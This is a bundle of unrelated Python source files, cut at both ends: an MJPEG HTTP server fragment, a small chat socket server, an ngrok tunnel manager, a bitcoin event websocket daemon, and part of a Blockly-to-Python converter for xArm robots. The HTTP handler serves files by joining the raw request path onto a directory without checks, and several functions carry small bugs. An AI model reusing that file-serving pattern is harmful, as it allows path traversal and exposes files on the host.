f = open(dir_file + os.sep + self.path)
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(f.read())
f.close()
return
except IOError:
self.send_error(404,'File Not Found: %s' % self.path)
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
stopped = False
"""Handle requests in a separate thread."""
def serve_forever(self):
while not self.stopped:
self.handle_request()
def terminate(self):
self.server_close()
self.stopped = True
# close all thread
if self.socket != -1:
self.socket.close()
if __name__ == "__main__":
# http server
http_server = ThreadedHTTPServer(('0.0.0.0', 7070), MJPEGStreamHandler)
http_server_thread = threading.Thread(target = http_server.serve_forever)
http_server_thread.daemon = True
http_server_thread.start()
try:
while True:
time.sleep(1)
except Exception as e:
pass
except KeyboardInterrupt as e:
LOG.info("user exits\n")
finally:
if http_server is not None:
http_server.terminate()
|
servidor.py
|
import socket
import threading
import socketserver
def tratarCliente(clientsocket, adress):
while True:
msg_cliente = clientsocket.recv(1024).decode("utf-8") # para transformar em string -> usar o decode
for i in range(0,len(lista_sockets)):
if(adress != lista_adresses[i]): # não enviar a mensagem do próprio cliente
lista_sockets[i].send(bytes(msg_cliente,"utf-8"))
print(msg_cliente)
if not msg_cliente: # isso vai servir para não dar erro de ficar tentando receber recv caso matarmos o cliente no terminal
clientsocket.close()
lista_sockets.remove(clientsocket)
break
lista_sockets = []
lista_adresses = []
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(("localhost",5556))
print("Escutando...")
s.listen(2)
while True:
clientsocket, adress = s.accept()
print("Servidor recebeu concexao de {}".format(adress))
lista_sockets.append(clientsocket)
lista_adresses.append(adress)
t = threading.Thread(target=tratarCliente,args=(clientsocket, adress))
t.daemon = True # vai acabar a thread quando fecharmos o programa
t.start()
|
main.py
|
"""
Ngrok Web Manager
Github: @thisiskeanyvy
Instgram: @thisiskeanyvy
Twitter: @thisiskeanyvy
"""
import os, socket, threading
from time import *
from set import *
from webserver import *
from pyngrok import ngrok, conf
#background jobs
webserver_start = threading.Thread(target=webserver_start, name="Ngrok Web Manager")
def main():
set_clear()
webserver_start.start()
admin_tunnel_request = str(input("Do you want to use an Ngrok tunnel for the administration interface? (y or n) "))
if admin_tunnel_request == "y":
public_admin()
else:
print(f"Admin interface : http://127.0.0.1:5000")
tunnel_status()
def public_admin():
public_tunnel_url = ngrok.connect(5000, "http").public_url
print(f"Admin interface : {public_tunnel_url.replace('http','https')}")
def config():
ngrok.set_auth_token("yourtoken")
conf.get_default().region = "fr"
def type():
if type == "ssh":
port = 22
protocol = "tcp"
elif type == "http":
port = 80
protocol = "http"
else:
port = "customport"
protocol = "customport"
def tunnel_status():
ngrok.get_tunnels()
def tunnel_start():
global tunnel_url
try:
tunnel_url = ngrok.connect(80, "http").public_url
print(tunnel_url)
except KeyboardInterrupt:
print("Stopping ngrok service...")
ngrok.kill()
def tunnel_stop():
ngrok.disconnect(tunnel_url)
if __name__ == "__main__":
main()
|
bitcoin_event.py
|
#!/usr/bin/python
import sqlite3
import os
from threading import Lock
db_filename = 'bitcoin_events.db'
db_filename = os.path.join(os.path.dirname(os.path.realpath(__file__)), db_filename)
# connect db
db_lock = Lock()
conn = sqlite3.connect(db_filename)
# create tables
c = conn.cursor()
c.execute('''create table if not exists txs
(tx text, processed int)''')
c.execute('''create table if not exists blocks
(block text, processed int)''')
c.close()
conn.commit()
def process_tx(tx):
with db_lock:
conn.execute('insert into txs (tx, processed) values (?, 0)', (tx,))
conn.commit()
def process_block(block):
with db_lock:
conn.execute('insert into blocks (block, processed) values (?, 0)', (block,))
conn.commit()
def get_db_txs(conn):
with db_lock:
items = []
txs = conn.execute('select * from txs where processed=0').fetchall()
for tx in txs:
conn.execute('update txs set processed=1 where tx=?', (tx[0],))
items.append(tx[0])
conn.commit()
return items
def get_db_blocks(conn):
with db_lock:
items = []
blocks = conn.execute('select * from blocks where processed=0').fetchall()
for block in blocks:
conn.execute('update blocks set processed=1 where block=?', (block[0],))
items.append(block[0])
conn.commit()
return items
def serve(port, host):
from websocket_server import WebsocketServer
from threading import Thread, Event
import signal
def message_received(client, server, message):
print 'message_received:', message
cmds = message.split('|')
for cmd in cmds:
if cmd.startswith('addr='):
address = cmd[5:]
if server.watched_addresses.has_key(address):
server.watched_addresses[address].append(client)
else:
server.watched_addresses[address] = [client]
if cmd == 'blocks':
server.block_watchers.append(client)
def client_left(client, server):
print 'client_left:', client
addrs = []
for key in server.watched_addresses:
if client in server.watched_addresses[key]:
addrs.append(key)
for addr in addrs:
clients = server.watched_addresses[addr]
clients.remove(client)
if not clients:
del server.watched_addresses[addr]
if client in server.block_watchers:
server.block_watchers.remove(client)
def service_thread(ws_server, evt):
from bitcoinrpc.authproxy import AuthServiceProxy, JSONRPCException
from bitrisk.bitcoind_config import read_default_config
import json
import decimal
config = read_default_config()
testnet = ''
if config.has_key('testnet'):
testnet = config['testnet']
rpc_user = config['rpcuser']
rpc_password = config['rpcpassword']
rpc_connection = AuthServiceProxy("http://%s:%s@%s:%s8332"%(rpc_user, rpc_password, host, testnet))
conn = sqlite3.connect(db_filename)
while not evt.wait(5):
txs = get_db_txs(conn)
for tx in txs:
print 'tx:', tx
tx = rpc_connection.gettransaction(tx)
for details in tx['details']:
addr = details['address']
if ws_server.watched_addresses.has_key(addr):
def decimal_default(obj):
if isinstance(obj, decimal.Decimal):
return float(obj)
raise TypeError
msg = json.dumps(tx, default=decimal_default)
for client in ws_server.watched_addresses[addr]:
ws_server.send_message(client, msg)
blocks = get_db_blocks(conn)
for block in blocks:
print 'block:', block
for client in ws_server.block_watchers:
ws_server.send_message(client, block)
server = WebsocketServer(port, host)
server.watched_addresses = {}
server.block_watchers = []
server.set_fn_message_received(message_received)
server.set_fn_client_left(client_left)
evt = Event()
thread = Thread(target=service_thread, args=(server, evt))
thread.start()
server.run_forever() # catches and exits on SIGINT
evt.set() # stop service_thread
thread.join()
def print_db(table):
if table != 'txs' and table != 'blocks':
print 'table %s does not exist' % table
return
if table == 'txs':
txs = conn.execute('select * from txs').fetchall()
print 'txs (%d)' % len(txs)
for tx in txs:
print ' ', tx
if table == 'blocks':
blocks = conn.execute('select * from blocks').fetchall()
print 'blocks (%d)' % len(blocks)
for block in blocks:
print ' ', block
if __name__ == '__main__':
import sys
if len(sys.argv) >= 3:
cmd = sys.argv[1]
arg = sys.argv[2]
if cmd == 'tx':
process_tx(arg)
elif cmd == 'block':
process_block(arg)
elif cmd == 'print':
print_db(arg)
elif cmd == 'serve':
from bitrisk.daemon import Daemon
class BitcoinEventDaemon(Daemon):
def run(self):
host = os.getenv('HOST', '127.0.0.1')
serve(8888, host)
daemon = BitcoinEventDaemon('/tmp/bitcoin-event-daemon.pid')
if 'start' == arg:
daemon.start()
elif 'stop' == arg:
daemon.stop()
elif 'restart' == arg:
daemon.restart()
elif 'foreground' == arg:
daemon.run()
else:
print "usage: %s serve start|stop|restart|foreground" % sys.argv[0]
sys.exit(2)
sys.exit(0)
|
blockly_tool.py
|
#!/usr/bin/env python3
# Software License Agreement (BSD License)
#
# Copyright (c) 2019, UFACTORY, Inc.
# All rights reserved.
#
# Author: Vinman <vinman.wen@ufactory.cc> <vinman.cub@gmail.com>
try:
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
import re
import sys
import json
import time
import random
from .blockly_highlight_block import HIGHLIGHT_BLOCKS
class BlocklyTool(object):
def __init__(self, path):
self.tree = ET.parse(path)
self.root = self.tree.getroot()
self.namespace = self.get_namespace()
self._ops = {
'EQ': '==',
'NEQ': '!=',
'LT': '<',
'LTE': '<=',
'GT': '>',
'GTE': '>='
}
self._ops2 = {
'===': '==',
'!==': '!=',
'>=': '>=',
'>': '>',
'<=': '<=',
'<': '<',
}
self._code_list = []
self._hasEvent = False
self._events = {}
self._funcs = {}
self._func_cls_exist = False
self._func_index = 0
self._index = -1
self._first_index = 0
self._is_insert = False
self.codes = ''
self._succeed = True
self._show_comment = False
self._highlight_callback = None
@property
def index(self):
self._index += 1
return self._index
@property
def func_index(self):
self._func_index += 1
return self._func_index
@property
def first_index(self):
self._first_index += 1
self._index += 1
return self._first_index
def _append_to_file(self, data):
if not self._is_insert:
self._code_list.append(data)
else:
self._code_list.insert(self.first_index, data)
def _insert_to_file(self, i, data):
self._code_list.insert(i, data)
def get_namespace(self):
try:
r = re.compile('({.+})')
if r.search(self.root.tag) is not None:
ns = r.search(self.root.tag).group(1)
else:
ns = ''
except Exception as e:
# print(e)
ns = ''
return ns
def get_node(self, tag, root=None):
if root is None:
root = self.root
return root.find(self.namespace + tag)
def get_nodes(self, tag, root=None, descendant=False, **kwargs):
if root is None:
root = self.root
nodes = []
if descendant:
func = root.iter
else:
func = root.findall
for node in func(self.namespace + tag):
flag = True
for k, v in kwargs.items():
if node.attrib[k] != v:
flag = False
if flag:
nodes.append(node)
return nodes
def _init_py3(self, arm=None, init=True, wait_seconds=1, mode=0, state=0, error_exit=True, stop_exit=True):
self._insert_to_file(self.index, '#!/usr/bin/env python3')
self._insert_to_file(self.index, '# Software License Agreement (BSD License)\n#')
self._insert_to_file(self.index, '# Copyright (c) {}, UFACTORY, Inc.'.format(time.localtime(time.time()).tm_year))
self._insert_to_file(self.index, '# All rights reserved.\n#')
self._insert_to_file(self.index, '# Author: Vinman <vinman.wen@ufactory.cc> <vinman.cub@gmail.com>\n')
self._insert_to_file(self.index, '"""')
self._insert_to_file(self.index, '# Notice')
self._insert_to_file(self.index, '# 1. Changes to this file on Studio will not be preserved')
self._insert_to_file(self.index, '# 2. The next conversion will overwrite the file with the same name')
self._insert_to_file(self.index, '"""')
self._insert_to_file(self.index, 'import sys')
self._insert_to_file(self.index, 'import math')
self._insert_to_file(self.index, 'import time')
self._insert_to_file(self.index, 'import datetime')
self._insert_to_file(self.index, 'import random')
self._insert_to_file(self.index, 'import traceback')
self._insert_to_file(self.index, 'import threading\n')
self._insert_to_file(self.index, '"""')
self._insert_to_file(self.index, '# xArm-Python-SDK: https://github.com/xArm-Developer/xArm-Python-SDK')
self._insert_to_file(self.index, '# git clone git@github.com:xArm-Developer/xArm-Python-SDK.git')
self._insert_to_file(self.index, '# cd xArm-Python-SDK')
self._insert_to_file(self.index, '# python setup.py install')
self._insert_to_file(self.index, '"""')
self._insert_to_file(self.index, 'try:')
self._insert_to_file(self.index, ' from xarm.tools import utils')
self._insert_to_file(self.index, 'except:')
self._insert_to_file(self.index, ' pass')
self._insert_to_file(self.index, 'from xarm import version')
self._insert_to_file(self.index, 'from xarm.wrapper import XArmAPI\n')
# self._insert_to_file(self.index, 'locals_keys = list(locals().keys())\n\n')
self._insert_to_file(self.index, 'def pprint(*args, **kwargs):')
self._insert_to_file(self.index, ' try:')
self._insert_to_file(self.index, ' stack_tuple = traceback.extract_stack(limit=2)[0]')
self._insert_to_file(self.index, ' print(\'[{}][{}] {}\'.format('
'time.strftime(\'%Y-%m-%d %H:%M:%S\', time.localtime(time.time())), '
'stack_tuple[1], \' \'.join(map(str, args))))')
self._insert_to_file(self.index, ' except:')
# self._insert_to_file(self.index, ' pass')
self._insert_to_file(self.index, ' print(*args, **kwargs)\n')
self._insert_to_file(self.index, 'pprint(\'xArm-Python-SDK Version:{}\'.format(version.__version__))\n')
# if self._highlight_callback is None:
# self._insert_to_file(self.index, 'highlight_callback = lambda x:x')
if arm is None:
self._insert_to_file(self.index, 'arm = XArmAPI(sys.argv[1])')
elif isinstance(arm, str):
self._insert_to_file(self.index, 'arm = XArmAPI(\'{}\')'.format(arm))
if init:
self._insert_to_file(self.index, 'arm.clean_warn()')
self._insert_to_file(self.index, 'arm.clean_error()')
self._insert_to_file(self.index, 'arm.motion_enable(True)')
self._insert_to_file(self.index, 'arm.set_mode({})'.format(mode))
self._insert_to_file(self.index, 'arm.set_state({})'.format(state))
if wait_seconds > 0:
self._insert_to_file(self.index, 'time.sleep({})\n'.format(wait_seconds))
variables = self.parse_vars()
variables = {var: 0 for var in variables}
self._insert_to_file(self.index, 'variables = {}'.format(variables))
self._insert_to_file(self.index, 'params = {\'speed\': 100, \'acc\': 2000, '
'\'angle_speed\': 20, \'angle_acc\': 500, '
'\'events\': {}, \'variables\': variables, '
'\'callback_in_thread\': True, \'quit\': False}')
if error_exit:
self._insert_to_file(self.index, '\n\n# Register error/warn changed callback')
self._insert_to_file(self.index, 'def error_warn_change_callback(data):')
self._insert_to_file(self.index, ' if data and data[\'error_code\'] != 0:')
# self._insert_to_file(self.index, ' arm.set_state(4)')
self._insert_to_file(self.index, ' params[\'quit\'] = True')
self._insert_to_file(self.index, ' pprint(\'err={}, quit\'.format(data[\'error_code\']))')
self._insert_to_file(self.index, ' arm.release_error_warn_changed_callback(error_warn_change_callback)')
self._insert_to_file(self.index, 'arm.register_error_warn_changed_callback(error_warn_change_callback)')
if stop_exit:
self._insert_to_file(self.index, '\n\n# Register state changed callback')
self._insert_to_file(self.index, 'def state_changed_callback(data):')
self._insert_to_file(self.index, ' if data and data[\'state\'] == 4:')
self._insert_to_file(self.index, ' if arm.version_number[0] > 1 or (arm.version_number[0] == 1 and arm.version_number[1] > 1):')
self._insert_to_file(self.index, ' params[\'quit\'] = True')
self._insert_to_file(self.index, ' pprint(\'state=4, quit\')')
self._insert_to_file(self.index, ' arm.release_state_changed_callback(state_changed_callback)')
self._insert_to_file(self.index, 'arm.register_state_changed_callback(state_changed_callback)')
self._insert_to_file(self.index, '\n\n# Register counter value changed callback')
self._insert_to_file(self.index, 'if hasattr(arm, \'register_count_changed_callback\'):')
self._insert_to_file(self.index, ' def count_changed_callback(data):')
self._insert_to_file(self.index, ' if not params[\'quit\']:')
self._insert_to_file(self.index, ' pprint(\'counter val: {}\'.format(data[\'count\']))')
self._insert_to_file(self.index, ' arm.register_count_changed_callback(count_changed_callback)')
self._insert_to_file(self.index, '\n\n# Register connect changed callback')
self._insert_to_file(self.index, 'def connect_changed_callback(data):')
self._insert_to_file(self.index, ' if data and not data[\'connected\']:')
self._insert_to_file(self.index, ' params[\'quit\'] = True')
self._insert_to_file(self.index, ' pprint(\'disconnect, connected={}, reported={}, quit\'.format(data[\'connected\'], data[\'reported\']))')
self._insert_to_file(self.index, ' arm.release_connect_changed_callback(error_warn_change_callback)')
self._insert_to_file(self.index, 'arm.register_connect_changed_callback(connect_changed_callback)\n')
self._first_index = self._index
def _finish_py3(self, error_exit=True, stop_exit=True):
if self._hasEvent:
self._append_to_file('\n# Main loop')
self._append_to_file('while arm.connected and arm.error_code == 0 and not params[\'quit\']:')
self._append_to_file(' time.sleep(0.5)')
self._append_to_file('\n# release all event')
self._append_to_file('if hasattr(arm, \'release_count_changed_callback\'):')
self._append_to_file(' arm.release_count_changed_callback(count_changed_callback)')
if error_exit:
self._append_to_file('arm.release_error_warn_changed_callback(state_changed_callback)')
if stop_exit:
self._append_to_file('arm.release_state_changed_callback(state_changed_callback)')
self._append_to_file('arm.release_connect_changed_callback(error_warn_change_callback)\n')
def to_python(self, path=None, arm=None, init=True, wait_seconds=1, mode=0, state=0,
error_exit=True, stop_exit=True, show_comment=False, **kwargs):
self._show_comment = show_comment
self._succeed = True
self._highlight_callback = kwargs.get('highlight_callback', None)
self._init_py3(arm=arm, init=init, wait_seconds=wait_seconds, mode=mode, state=state, error_exit=error_exit, stop_exit=stop_exit)
self.parse()
self._finish_py3(error_exit=error_exit, stop_exit=stop_exit)
self.codes = '\n'.join(self._code_list)
if path is not None:
with open(path, 'w', encoding='utf-8') as f:
f.write('{}\n'.format(self.codes))
return self._succeed
def parse_vars(self):
var_list = []
variables = self.get_nodes('variables')
for vars in variables:
for variable in self.get_nodes('variable', root=vars):
var_list.append(variable.text)
return var_list
def parse(self, root=None, prefix='', arg_map=None):
blocks = self.get_nodes('block', root=root)
if blocks:
for block in blocks:
is_statement = root is None
if root is not None:
if root.tag == self.namespace + 'statement':
is_statement = True
while block is not None:
if not is_statement:
block = self.get_node('next', root=block)
if not block:
break
block = self.get_node('block', root=block)
else:
is_statement = False
if block.attrib.get('disabled', False):
continue
func = getattr(self, '_handle_{}'.format(block.attrib['type']), None)
if func:
if self._highlight_callback is not None:
if block.attrib['type'] in HIGHLIGHT_BLOCKS:
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} highlight_callback(\'{}\')'.format(prefix, block.attrib['id']))
# if block.attrib['type'] not in ['procedures_defnoreturn', 'procedures_defreturn', 'controls_if']:
# self._append_to_file('{}highlight_callback(\'{}\')'.format(prefix, block.attrib['id']))
func(block, prefix, arg_map=arg_map)
else:
self._succeed = False
print('block {} can\'t convert to python code'.format(block.attrib['type']))
# block = self.get_node('block', root=root)
# while block is not None:
# if not is_statement:
# block = self.get_node('next', root=block)
# if not block:
# break
# block = self.get_node('block', root=block)
# else:
# is_statement = False
# if block.attrib.get('disabled', False):
# continue
# func = getattr(self, '_handle_{}'.format(block.attrib['type']), None)
# if func:
# func(block, prefix)
# else:
# print('block {} can\'t convert to python code'.format(block.attrib['type']))
def __check_is_quit(self, prefix):
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
return ' {}'.format(prefix)
def _handle_set_speed(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
if field is not None:
value = field.text
else:
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}params[\'speed\'] = {}'.format(prefix, value))
def _handle_set_acceleration(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
if field is not None:
value = field.text
else:
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}params[\'acc\'] = {}'.format(prefix, value))
def _handle_set_angle_speed(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
if field is not None:
value = field.text
else:
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}params[\'angle_speed\'] = {}'.format(prefix, value))
def _handle_set_angle_acceleration(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
if field is not None:
value = field.text
else:
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}params[\'angle_acc\'] = {}'.format(prefix, value))
def _handle_set_counter_increase(self, block, prefix='', arg_map=None):
# field = self.get_node('field', root=block)
# if field is not None:
# value = field.text
# else:
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set counter increase'.format(prefix))
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}arm.set_counter_increase()'.format(prefix))
def _handle_set_counter_reset(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# set counter reset'.format(prefix))
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}arm.set_counter_reset()'.format(prefix))
def _handle_reset(self, block, prefix='', arg_map=None):
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.reset()'.format(prefix))
def _handle_sleep(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
value = self.__get_block_val(value, arg_map=arg_map)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set pause time'.format(prefix))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_pause_time({})'.format(prefix, value))
def _handle_move(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
orientation = fields[0].text
wait = fields[1].text == 'TRUE'
value = fields[2].text
if orientation == 'forward':
param = 'x'
elif orientation == 'backward':
param = 'x'
value = '-{}'.format(value)
elif orientation == 'left':
param = 'y'
elif orientation == 'right':
param = 'y'
value = '-{}'.format(value)
elif orientation == 'up':
param = 'z'
elif orientation == 'down':
param = 'z'
value = '-{}'.format(value)
else:
return
if self._show_comment:
self._append_to_file('{}# relative move'.format(prefix))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_position({}={}, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'relative=True, wait={})'.format(prefix, param, value, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_position, code={{}}\'.format(code))'.format(prefix))
def _handle_move_arc_to(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
p_block = self.get_node('block', root=value)
fields = self.get_nodes('field', root=p_block)
values = []
for field in fields[:-2]:
values.append(float(field.text))
radius = float(fields[-2].text)
wait = fields[-1].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# move{}line and {}'.format(
prefix, ' arc ' if float(radius) >= 0 else ' ', 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_position(*{}, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'radius={}, wait={})'.format(prefix, values, radius, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_position, code={{}}\'.format(code))'.format(prefix))
def _handle_move_circle(self, block, prefix='', arg_map=None):
values = self.get_nodes('value', root=block)
# percent = self.get_nodes('field', root=values[2], descendant=True)[0].text
# percent = round(float(percent) / 360 * 100, 2)
# wait = self.get_nodes('field', root=values[3], descendant=True)[0].text == 'TRUE'
percent = self.__get_block_val(values[2], arg_map=arg_map)
wait = self.__get_block_val(values[3], arg_map=arg_map)
if wait == 'TRUE' or wait == 'FALSE':
wait = wait == 'TRUE'
p1_block = self.get_node('block', root=values[0])
fields = self.get_nodes('field', root=p1_block)
pose1 = []
for field in fields:
pose1.append(float(field.text))
p2_block = self.get_node('block', root=values[1])
fields = self.get_nodes('field', root=p2_block)
pose2 = []
for field in fields:
pose2.append(float(field.text))
if self._show_comment:
self._append_to_file('{}# move circle and {}'.format(
prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.move_circle({}, {}, float({}) / 360 * 100, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'wait={})'.format(prefix, pose1, pose2, percent, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'move_circle, code={{}}\'.format(code))'.format(prefix))
def _handle_move_7(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
p_block = self.get_node('block', root=value)
fields = self.get_nodes('field', root=p_block)
values = []
for field in fields[:-1]:
values.append(float(field.text))
wait = fields[-1].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# move joint and {}'.format(prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_servo_angle(angle={}, speed=params[\'angle_speed\'], '
'mvacc=params[\'angle_acc\'], wait={})'.format(prefix, values, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_servo_angle, code={{}}\'.format(code))'.format(prefix))
def _handle_move_joints(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
values = []
for field in fields[:-1]:
values.append(float(field.text))
radius_fields = self.get_nodes('field', root=block, name='r')
if len(radius_fields) > 0:
radius = values[-1]
values = values[:-1]
else:
radius = None
wait = fields[-1].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# move joint and {}'.format(prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_servo_angle(angle={}, speed=params[\'angle_speed\'], '
'mvacc=params[\'angle_acc\'], wait={}, radius={})'.format(prefix, values, wait, radius))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_servo_angle, code={{}}\'.format(code))'.format(prefix))
def _handle_move_cartesian(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
values = []
for field in fields[:-2]:
values.append(float(field.text))
radius = float(fields[-2].text)
wait = fields[-1].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# move{}line and {}'.format(
prefix, ' arc ' if float(radius) >= 0 else ' ', 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_position(*{}, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'radius={}, wait={})'.format(prefix, values, radius, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_position, code={{}}\'.format(code))'.format(prefix))
def _handle_move_tool_line(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
values = []
for field in fields[:-1]:
values.append(float(field.text))
wait = fields[-1].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# move tool line and {}'.format(prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_tool_position(*{}, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'wait={})'.format(prefix, values, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_tool_position, code={{}}\'.format(code))'.format(prefix))
def _handle_move_joints_var(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
wait = field.text == 'TRUE'
value_nodes = self.get_nodes('value', root=block)
values = []
for val_node in value_nodes:
val = self.__get_condition_expression(val_node, arg_map=arg_map)
values.append(val)
radius_fields = self.get_nodes('value', root=block, name='r')
if len(radius_fields) > 0:
radius = values[-1]
values = values[:-1]
else:
radius = None
values = '[{}]'.format(','.join(values))
if self._show_comment:
self._append_to_file('{}# move joint and {}'.format(prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_servo_angle(angle={}, speed=params[\'angle_speed\'], '
'mvacc=params[\'angle_acc\'], wait={}, radius={})'.format(prefix, values, wait, radius))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_servo_angle, code={{}}\'.format(code))'.format(prefix))
def _handle_move_cartesian_var(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
wait = field.text == 'TRUE'
value_nodes = self.get_nodes('value', root=block)
values = []
for val_node in value_nodes:
val = self.__get_condition_expression(val_node, arg_map=arg_map)
values.append(val)
radius = values.pop()
values = '[{}]'.format(','.join(values))
if self._show_comment:
try:
self._append_to_file('{}# move{}line and {}'.format(
prefix, ' arc ' if float(radius) >= 0 else ' ', 'wait' if wait else 'no wait'))
except:
pass
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_position(*{}, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'radius={}, wait={})'.format(prefix, values, radius, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_position, code={{}}\'.format(code))'.format(prefix))
def _handle_motion_set_state(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
state = fields[0].text
if self._show_comment:
self._append_to_file('{}# set state'.format(prefix))
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}arm.set_state({})'.format(prefix, state))
def _handle_motion_stop(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# emergency stop'.format(prefix))
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}arm.emergency_stop()'.format(prefix))
def _handle_studio_run_traj(self, block, prefix='', arg_map=None):
filename = self.get_node('field', root=block).text
value = self.get_node('value', root=block)
times = self.get_nodes('field', root=value, descendant=True)[0].text
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.playback_trajectory(times={}, filename=\'{}\', wait=True)'.format(prefix, times, filename))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'playback_trajectory, code={{}}\'.format(code))'.format(prefix))
def _handle_app_studio_traj(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
filename = fields[0].text
speed = fields[1].text
value = self.get_node('value', root=block)
times = self.get_nodes('field', root=value, descendant=True)[0].text
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.playback_trajectory(times={}, filename=\'{}\', wait=True, double_speed={})'.format(prefix, times, filename, speed))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'playback_trajectory, code={{}}\'.format(code))'.format(prefix))
def _handle_tool_message(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', block)
msg = json.dumps(fields[-1].text, ensure_ascii=False)
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}print({})'.format(prefix, msg))
# msg = fields[-1].text
# self._append_to_file('{}print(\'{}\')'.format(prefix, message))
# self._append_to_file('{}print(\'{{}}\'.format(\'{}\'))'.format(prefix, message))
def _handle_tool_console(self, block, prefix='', arg_map=None):
